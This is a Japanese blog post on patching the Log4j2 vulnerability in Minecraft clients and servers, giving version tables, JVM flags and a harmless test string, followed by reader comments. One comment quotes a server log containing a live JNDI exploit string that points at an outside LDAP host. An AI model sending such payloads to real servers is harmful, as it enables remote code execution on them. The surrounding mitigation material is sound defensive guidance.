ブックマーク 0 揚げたてのポテト
ポテコちゃん
揚げたてのポテト
先日、Log4j2の脆弱性に関する問題が話題になりましたね。
ポテコちゃん
揚げたてのポテト
マイクラにも大きく関わる問題なので、確認しながら見ていきましょう。今回はよく分からない人のために対応方法をまとめてみました。
当記事では、Log4j2の脆弱性に関する問題でマインクラフトでの対応方法をまとめた記事になります。
目次
Log4j2問題って何?
ポテコちゃん
マインクラフトでは、「Log4j2」というログを出力するプログラムが使われています。
今回、このLog4j2にて重大な脆弱性が発見されたため、大きく話題になりました。
脆弱性とは、プログラムの不具合や設計上のミスが原因となって発生したセキュリティ上の欠陥のこと
2021年12月10日にMinecraftの関連団体よりクライアント及びサーバーに関する重大な脆弱性が見つかったとの警告が発表されました。
マインクラフトでは、この脆弱性を悪用することで、任意のリモートコードを実行できてしまう例が報告されています。
要するに任意のコードを実行させると最悪パソコン操作もできてしまうという重大な問題 です。
そのため、マインクラフトではこの問題に対応するべく、クライアント側やサーバー側で対処する必要 があります。
このLog4j2問題はほぼ全てのバージョン、全プレイヤーが対象となるので必ず対処する必要があります。
公式クライアントの対処方法
公式クライアント(公式ランチャー)では、2021年12月10日以降よりLog4j2問題に対するパッチ(修正プログラム)が更新されました。
このパッチは、公式ランチャーを起動すれば自動的にパッチが適用される のでクライアント側の対処方法はこれで完了です。
そのため、以前と同じく好きなバージョンで遊ぶことができる ようになりました。
【追記】新ランチャーや旧ランチャーでも対応しているとのこと
あわせて読みたい
【マイクラ】新ランチャーへのアップグレード方法【新ランチャー】
どうもこんにちわ、揚げたてのポテトです。 2021年11月2日よりマイクラランチャーのアップグレードが表示されるようになりました。本日はマイクラランチャーのアップグ…
Forgeクライアントの対応方法
次にMODで遊ぶ際に主にFrogeを導入してプレイすると思います。
その時に公式クライアントではなく、Forgeクライアントになるので上記の対策が適用されません。
そのため、Forgeをダウンロードするときにパッチが適用されたForgeをダウンロードする必要があります。
揚げたてのポテト
以下にバージョンごとにまとめたので参考にしてください。
1.18.1以降:最初からパッチ適用 1.18 :バージョン38.0.17以降よりパッチ適用1.17.1 :バージョン37.1.1以降よりパッチ適用1.16.5 :バージョン36.2.20以降よりパッチ適用1.15.2 :バージョン31.2.57以降よりパッチ適用1.14.4 :バージョン28.2.25以降よりパッチ適用1.13.2 :バージョン25.0.222以降よりパッチ適用1.12.2 :バージョン2-14.23.5.2857以降よりパッチ適用
1.11.2以下のバージョンは現時点ではパッチはありません。
サーバー側の対処方法
マイクラサーバーでは、バニラサーバーやプラグインサーバー、MODサーバーによってそれぞれ対処方法が異なりますので、注意してください。
バージョン1.18.1以降は既にパッチが適用されているので特に対処する必要はありません。
Minecraft Realmsも既にパッチが適用されています。
Minecraftの公式サイト(日本語版)は参考にしないで!!【修正済】
https://www.minecraft.net/ja-jp/article/important-message–security-vulnerability-java-edition-jp
上記のMinecraftの公式サイト(日本語版)でもサーバーの対策方法が載っていますが、1.7~1.11.2の対策方法が間違っている ので、絶対に参考にしないように注意してください。
誤「-Dlog4j.commercialFile=log4j2_17-111.xml」
正「-Dlog4j.configurationFile=log4j2_17-111.xml」
上記の内容は修正されました。(後日削除します)
バニラサーバー(公式サーバー)の場合
バニラサーバーはマイクラ公式からダウンロードするサーバー(公式サーバー)のことです。
あわせて読みたい
【1.19対応】誰でも簡単にマイクラサーバーの立て方を紹介【公式サーバー 編】
どうもこんにちは、揚げたてのポテトです。 どうもー!助手のポテコちゃんです! 皆さんは友達や身内と一緒に自分たちのワールドで遊んでみたいと思ったことありません…
各バージョンの対処方法
バッチファイルに追加記述とjarファイル名を変更することで動作します。
バージョン1.17~1.18
バッチファイルの記述に「-Dlog4j2.formatMsgNoLookups=true」を追加 する必要があります。
コード
@echo off java -Xmx1024M -Xms1024M -Dlog4j2.formatMsgNoLookups=true -jar server-1.17.jar nogui pause
バージョン1.12~1.16.5
「log4j2_112-116.xml 」というXMLファイルを作成 し、サーバーフォルダに設置する必要があります。
その後、バッチファイルに「-Dlog4j.configurationFile=log4j2_112-116.xml」を追加 する必要があります。
log4j2_112-116.xml|ダウンロード
コード
@echo off java -Xmx1024M -Xms1024M -Dlog4j.configurationFile=log4j2_112-116.xml -jar server-1.12.jar nogui pause
バージョン1.7~1.11.2
「log4j2_17-111.xml 」というXMLファイルを作成 し、サーバーフォルダに設置する必要があります。
その後、バッチファイルに「-Dlog4j.configurationFile=log4j2_17-111.xml」を追加 する必要があります。
コード
@echo off java -Xmx1024M -Xms1024M -Dlog4j.configurationFile=log4j2_17-111.xml -jar server-1.8.8.jar nogui pause
バージョン1.7以下
1.7以下のバージョンはlog4j脆弱性の影響がありませんので特に対処する必要はありません。
プラグインサーバー(SpigotMC/PaperMC)の場合
プラグインサーバーはそれぞれのバージョンによって最新のビルドにすることでパッチが適用されています。
あわせて読みたい
【1.19対応】誰でも簡単にマイクラプラグインサーバーの立て方【SpigotMC/ PaperMC編】
2022年6月1日に旧記事(PaperMC編)を当記事(SpigotMC編)に統合し、見やすくなりました。 どうもこんにちわ、揚げたてのポテトです。 どうもー!助手のポテコちゃんで…
投稿が見つかりません。
SpigotMCの場合
1.8.8以降のバージョンの最新のビルドをすることでパッチが適用されます。
非公式で入手できるGetBukkit だと最新のビルドには対応していない可能性があるので、必ず各自でビルドを行ってください。
あわせて読みたい
【マイクラ】SpigotMCサーバーのビルド方法
どうもこんにちわ、揚げたてのポテトです。 どうもー!助手のポテ子ちゃんです! 今回は、前回のプラグインサーバーの立て方【SpigotMC 編】で出てきたビルド方法につい…
PaperMCの場合
MODサーバー(Forge)の場合
ForgeにおいてもLog4j2問題のパッチ適用されているバージョンを使うように してください。
あわせて読みたい
【最新版対応】マイクラMODサーバーの立て方【ForgeMOD 編】
どうもこんにちは、揚げたてのポテトです! どうもー!助手のポテコちゃんです! みなさん!MODで遊ぶの好きですよね~でも1人で遊ぶのも飽きてきて、そろそろ他の人と…
1.18.1以降:最初からパッチ適用 1.18 :バージョン38.0.17以降よりパッチ適用1.17.1 :バージョン37.1.1以降よりパッチ適用1.16.5 :バージョン36.2.20以降よりパッチ適用1.15.2 :バージョン31.2.57以降よりパッチ適用1.14.4 :バージョン28.2.25以降よりパッチ適用1.13.2 :バージョン25.0.222以降よりパッチ適用1.12.2 :バージョン2-14.23.5.2857以降よりパッチ適用
1.11.2以下のバージョンは現時点ではパッチはありません。
プロキシサーバー(Waterfall/Velocity/VanillaCord)の場合
プロキシサーバーではBungeeCordもありますが、BungeeCordはLog4j2問題に影響されません。
その他のプロキシサーバーの対処方法を紹介します。
あわせて読みたい
【マイクラ】複数サーバー間を移動できるサーバーの立て方【BungeeCord・Waterfall・Travertine・Veloci…
どうもこんにちは、揚げたてのポテトです。 皆さん、海外のマルチサーバー等に参加した時に全く違うワールドに移動するのを経験したことありませんか? あるある!あれ…
Waterfallの場合
Velocity
VanillaCord
対象バージョンのビルド後、バニラサーバーの同じ対処手順で行う。
24時間快適なマイクラサーバーを立てるなら「ConoHa VPS」での構築がおすすめ!
\今なら700円クーポンを使って無料で試せます!/
あわせて読みたい
【マイクラ】ConoHa VPSってどんなサービス?マイクラサーバーはどれを選べばいいの?詳しく紹介します!
どうもこんにちは、揚げたてのポテトです。 本日はConoHa VPSはどんなサービスなのか、マイクラサーバーで立てる場合はどのサーバーが良いかを説明していきたいと思いま…
ConoHa VPSとは初期費用なし、最低利用期間なし、高性能VPS(超高速SSD、最新CPU搭載)なので、快適な24時間サーバーでいつでも友達とマルチプレイが楽しめます。
\【最大25%OFF】今なら「梅雨トクキャンペーン」 を実施中!【期間限定】/
梅雨トクキャンペーンとは、期間中の12ヶ月以上のVPS割引きっぷが対象!通常料金から最大25%OFF、月額536円~ ご利用できます。なかでも4GBと8GBプランの割引率が高く おすすめです!(2022年7月4日(月)12時まで)
格安でマイクラサーバーを立てるなら「Agames.jp」がおすすめ!
【Java版】バニラ、MOD、Spigot、PaperMC、Mohist、BungeeCord対応
【統合版】バニラ、PMMP対応
月額485円~レンタルサーバー|Agames
【Agames.jp】月額485円からマイクラサーバーを立てれるレンタルサーバーを紹介します!【格安VPS】
どうもこんにちわ、揚げたてのポテトです。 どうもー!助手のポテコちゃんです! 友達と一緒に自分たちだけのワールドを作って遊んでみたいと思ったことありませんか? …
低価格かつ高性能でマイクラサーバーは全て自動構築なので初心者でも簡単に立てられる!
脆弱性の確認方法
きちんと対策できているか不安の方は以下のコードをマイクラチャットで実行して確認することができます。
${date:YYYY}
上記のコマンドを「/(スラッシュ)」入れずにそのまま送信してください。
この時に「2022」(現在の西暦)と表示されなければ対策できています。
最後に
取り急ぎまとめた記事なので説明不足な部分もあるかと思いますが、改めて追記や修正を行いたいと思います。
Log4j2の脆弱性は大変危険な問題です。
サーバー運営してる人やマルチプレイで良く遊ぶ人は必ず対処を行いましょう!
揚げたてのポテト
最後まで読んでいただきありがとうございました。 次回の記事でお会いしましょう!
ブックマーク 0
更新の止まった古いプラグインって使ってても大丈夫ですかね?
PaperMCver1.16未満は
パッチが適用されていないそうですが
PaperMCでLog4j2の
対策をする方法は無いのですか?
1.18.1-39.0.0でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら [User Authenticator #2/INFO]: UUID of player FermatSleep is xxxxxx
[01:13:20] [Server thread/INFO]: Using new advancement loading for [email protected]xxxxx
[01:13:20] [Server thread/INFO]: FermatSleep[/xxxxx] logged in with entity id 3512 at (xxxxxx)
[01:13:20] [Server thread/INFO]: FermatSleep joined the game
[01:13:21] [Server thread/INFO]: ${jndi:ldap://185.233.105.120:1389/a}
[01:13:22] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[01:13:22] [Server thread/INFO]: FermatSleep left the game
みたいなログが残ってました。log4j?かなにかをされたと思うのですが具体的に何をされたか、何かされていた場合どう対処すればいいかわかりませんか?( ; ; )
現在1.16.5のmod入りサーバーで遊んでいます。
ランチャーとforgeを最新のものに更新し、公式のJVM引数もコピペ済みなのですが、アップデートなど行われていないMODを入れるのは避けるべきでしょうか?
mohistはもうパッチきましたか?